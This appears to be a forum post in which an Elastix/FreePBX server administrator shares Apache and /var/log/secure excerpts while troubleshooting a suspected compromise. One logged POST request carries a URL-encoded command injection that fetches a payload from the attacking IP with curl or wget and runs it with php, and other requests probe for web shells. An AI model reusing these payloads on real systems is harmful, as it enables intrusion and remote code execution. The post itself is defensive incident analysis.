    51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.1?act=cmd HTTP/1.1" 403 223
    51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.2 HTTP/1.1" 403 223
    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /recordings/main.php.2?act=cmd HTTP/1.1" 403 223
    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php HTTP/1.1" 404 206
    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php?act=cmd HTTP/1.1" 404 206
    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /vtigercrm/main.php HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /vtigercrm/main.php?act=cmd HTTP/1.1" 404 216
    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /config.all.php HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /recordings/config.all.php HTTP/1.1" 403 227
    51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /panel/config.all.php HTTP/1.1" 404 218
    51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /vtigercrm/config.all.php HTTP/1.1" 404 222
    51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /admin/config.all.php HTTP/1.1" 404 218
    51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /0x4148.php.call HTTP/1.1" 404 213
    51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /recordings/misc/?cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 218
    51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /graph.php?module=upload HTTP/1.1" 404 207
    51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /recordings/graph.php?module=upload HTTP/1.1" 403 222
    51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /vtigercrm/graph.php?module=upload HTTP/1.1" 404 217
    51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /vtigercrm/phpversions.php?module=upload HTTP/1.1" 404 223
    51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /recordings/phpversions.php?module=upload HTTP/1.1" 403 228
    51.15.12.13 - - [10/Jun/2017:04:56:23 -0400] "POST /phpversions.php?module=upload HTTP/1.1" 404 213
    216.218.206.66 - - [10/Jun/2017:06:00:25 -0400] "GET / HTTP/1.1" 200 5409
    216.218.206.66 - - [10/Jun/2017:06:01:06 -0400] "GET / HTTP/1.1" 200 5409
    183.129.160.229 - - [10/Jun/2017:06:21:05 -0400] "GET / HTTP/1.1" 200 5409
    163.172.69.33 - - [10/Jun/2017:09:28:26 -0400] "GET / HTTP/1.0" 400 362
    163.172.69.33 - - [10/Jun/2017:09:28:28 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
    163.172.69.33 - - [10/Jun/2017:09:30:18 -0400] "POST /recordings/index.php HTTP/1.1" 500 -
    163.172.69.33 - - [10/Jun/2017:09:30:20 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    98.242.248.14 - - [10/Jun/2017:09:45:25 -0400] "GET / HTTP/1.1" 500 -

      navaismo I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk

      I delete them over and over but they come back...

      I see strange POST commands on the access and ssl_access logs which I have already shared with you..

      navaismo This is my /var/log/secure log for June 9th:

      Jun 9 00:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 00:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 01:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 02:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 03:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
      Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
      Jun 9 04:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 04:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 05:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 06:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:17:51 voicesrv01 sshd[15163]: Accepted password for root from 98.242.248.14 port 58874 ssh2
      Jun 9 09:17:51 voicesrv01 sshd[15163]: pam_unix(sshd:session): session opened for user root by (uid=0)
      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBGROUP asterisk
      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBUSER asterisk
      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKGROUP asterisk
      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKUSER asterisk
      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVGROUP asterisk
      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVUSER asterisk
      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting ASTMANAGERHOST localhost
      Jun 9 09:20:05 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/retrieve_conf --run-install --skip-registry-checks
      Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
      Jun 9 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 11:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
